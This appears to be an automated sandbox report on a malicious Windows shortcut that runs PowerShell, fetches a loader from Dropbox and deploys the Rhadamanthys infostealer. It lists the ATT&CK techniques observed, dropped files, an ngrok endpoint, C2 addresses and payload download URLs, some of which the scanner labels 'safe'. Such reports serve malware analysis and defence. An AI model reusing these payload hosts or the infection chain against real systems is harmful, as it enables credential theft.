                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,31_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,31_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004CB0E0 GetVersionExA,31_2_004CB0E0
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000022.00000003.1896994723.0000000000B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000003.1903700839.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2024542815.0000000003400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.1911870837.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000022.00000003.1896994723.0000000000B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000003.1903700839.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2024542815.0000000003400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.1911870837.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		Valid Accounts11
                      Windows Management Instrumentation                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		21
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      File and Directory Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Registry Run Keys / Startup Folder                      		3
                      Obfuscated Files or Information                      		Security Account Manager145
                      System Information Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell                      		Login HookLogin Hook1
                      Software Packing                      		NTDS331
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets11
                      Process Discovery                      		SSHKeylogging114
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading                      		Cached Domain Credentials41
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572664 Sample: l92fYljXWF.lnk Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 83 ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com 2->83 85 ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com 2->85 87 7 other IPs or domains 2->87 111 Suricata IDS alerts for network traffic 2->111 113 Found malware configuration 2->113 115 Windows shortcut file (LNK) starts blacklisted processes 2->115 117 9 other signatures 2->117 14 cmd.exe 1 2->14         started        17 msedge.exe 113 417 2->17         started        20 svchost.exe 1 2 2->20         started        signatures3 process4 dnsIp5 131 Windows shortcut file (LNK) starts blacklisted processes 14->131 133 Suspicious powershell command line found 14->133 135 PowerShell case anomaly found 14->135 22 powershell.exe 14 28 14->22         started        27 conhost.exe 1 14->27         started        75 192.168.2.7, 123, 138, 2845 unknown unknown 17->75 77 192.168.2.13 unknown unknown 17->77 81 4 other IPs or domains 17->81 29 msedge.exe 17->29         started        31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        35 3 other processes 17->35 79 127.0.0.1 unknown unknown 20->79 signatures6 process7 dnsIp8 89 edge-block-www-env.dropbox-dns.com 162.125.69.15, 443, 49714, 49741 DROPBOXUS United States 22->89 91 www-env.dropbox-dns.com 162.125.69.18, 443, 49708, 49726 DROPBOXUS United States 22->91 93 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app 18.192.31.165, 443, 49702 AMAZON-02US United States 22->93 71 C:\Users\user\AppData\Local\...\836808032.bat, DOS 22->71 dropped 123 Windows shortcut file (LNK) starts blacklisted processes 22->123 125 Loading BitLocker PowerShell Module 22->125 127 Powershell drops PE file 22->127 37 cmd.exe 22->37         started        40 msedge.exe 11 22->40         started        95 uc7569213660364555d096b4af3d.dl.dropboxusercontent.com 29->95 97 googlehosted.l.googleusercontent.com 142.250.181.65, 443, 49774 GOOGLEUS United States 29->97 99 8 other IPs or domains 29->99 file9 signatures10 process11 signatures12 119 Windows shortcut file (LNK) starts blacklisted processes 37->119 121 Suspicious powershell command line found 37->121 42 powershell.exe 37->42         started        45 conhost.exe 37->45         started        47 msedge.exe 40->47         started        process13 file14 73 C:\Users\user\AppData\...\1061714629.exe, PE32 42->73 dropped 49 1061714629.exe 42->49         started        53 msedge.exe 42->53         started        process15 file16 69 C:\Users\user\Videos\...\DiskTuner.exe, PE32 49->69 dropped 103 Multi AV Scanner detection for dropped file 49->103 105 Detected unpacking (creates a PE file in dynamic memory) 49->105 107 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 49->107 109 3 other signatures 49->109 55 1061714629.exe 49->55         started        57 msedge.exe 53->57         started        signatures17 process18 process19 59 fontdrvhost.exe 55->59         started        63 WerFault.exe 55->63         started        dnsIp20 101 104.161.43.18, 2845, 49915 IOFLOODUS United States 59->101 129 Switches to a custom stack to bypass stack traces 59->129 65 fontdrvhost.exe 59->65         started        signatures21 process22 process23 67 WerFault.exe 65->67         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      l92fYljXWF.lnk24%ReversingLabsWin32.Trojan.Pantera
                      l92fYljXWF.lnk100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\1061714629.exe55%ReversingLabsWin32.Infostealer.Tinba

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      http://permanently-removed.invalid/v1/accountcapabilities:batchGet0%Avira URL Cloudsafe
                      http://permanently-removed.invalid/0%Avira URL Cloudsafe
                      http://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/signin/chrome/sync?ssp=10%Avira URL Cloudsafe
                      https://permanently-removed.invalid/embedded/setup/chrome/usermenu0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/LogoutYxAB0%Avira URL Cloudsafe
                      https://designerapp-int.azurewebsites.net/0%Avira URL Cloudsafe
                      https://uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/embedded/setup/v2/chromeos0%Avira URL Cloudsafe
                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef-UseBa0%Avira URL Cloudsafe
                      https://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com/cd/0/get/CgDuChhAhq4ymWrN2fW3pQFL0ERw62yLj1sISkvYJvyGBBxrec-guM6espnuVHhttXVGn6x43Swr7_AEalUXvAd4pMNhp6sfpbvTO6u9T55U_zuSnk9EfpX_z6ewBA9S4itVeH11I07C35wE49n3aa_d/file?dl=10%Avira URL Cloudsafe
                      https://uc4d30225f32433b48811132b259.dl.dropboxusercontent.com/cd/0/get/CgA8JuLWs7OjpVcFSgSqCoN1g_Tobb4iAfwkVoRbgR9qbAMmbxyAidqJNIi7Huw-hcGBD0ufTwW6CHbX0n9FQnC0MuzybQiO6NPUmvJaYNL-OcXb4tP6ZNkzf0t3vICLxdb6nduGvjzFLP1Hq4Rt5zOm/file?dl=10%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fg.microsoft.map.fastly.net
                      		199.232.214.172
                      		truefalse
                        		high
                        7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                        		18.192.31.165
                        		truefalse
                          		high
                          chrome.cloudflare-dns.com
                          		162.159.61.3
                          		truefalse
                            		high
                            edge-block-www-env.dropbox-dns.com
                            		162.125.69.15
                            		truefalse
                              		high
                              www-env.dropbox-dns.com
                              		162.125.69.18
                              		truefalse
                                		high
                                ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                		94.245.104.56
                                		truefalse
                                  		high
                                  googlehosted.l.googleusercontent.com
                                  		142.250.181.65
                                  		truefalse
                                    		high
                                    clients2.googleusercontent.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      bzib.nelreports.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          uc7569213660364555d096b4af3d.dl.dropboxusercontent.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.dropbox.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  uc4d30225f32433b48811132b259.dl.dropboxusercontent.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://www.dropbox.com/scl/fi/p8f846myv0cbs5975uszw/loader.txt?rlkey=xzx17r7jhir5r28db7j4zb4sl&dl=1false
                                                      		high
                                                      https://uc4d30225f32433b48811132b259.dl.dropboxusercontent.com/cd/0/get/CgA8JuLWs7OjpVcFSgSqCoN1g_Tobb4iAfwkVoRbgR9qbAMmbxyAidqJNIi7Huw-hcGBD0ufTwW6CHbX0n9FQnC0MuzybQiO6NPUmvJaYNL-OcXb4tP6ZNkzf0t3vICLxdb6nduGvjzFLP1Hq4Rt5zOm/file?dl=1false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.com/cd/0/get/CgDuChhAhq4ymWrN2fW3pQFL0ERw62yLj1sISkvYJvyGBBxrec-guM6espnuVHhttXVGn6x43Swr7_AEalUXvAd4pMNhp6sfpbvTO6u9T55U_zuSnk9EfpX_z6ewBA9S4itVeH11I07C35wE49n3aa_d/file?dl=1false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.compowershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000006.00000003.1466073179.00002DF402470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1480892763.00002DF402478000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1466332102.00002DF402474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631241546.000021C40027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.1631484840.000021C400280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://paper.dropbox.com/cloud-docs/editpowershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://anglebug.com/4633msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://anglebug.com/7382msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://issuetracker.google.com/284462263msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://anglebug.com/7714msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://permanently-removed.invalid/v1/accountcapabilities:batchGetmsedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.dropbox.com/scl/fi/qpowershell.exe, 00000011.00000002.1724766561.000001E54DE77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1595037005.0000020590074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://anglebug.com/6248msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://permanently-removed.invalid/signin/chrome/sync?ssp=1msedge.exe, 00000006.00000002.1480425430.00002DF4022C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://anglebug.com/6929msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://officeapps-df.live.compowershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://api.login.yahoo.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://anglebug.com/5281msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1571110372.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54DA46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
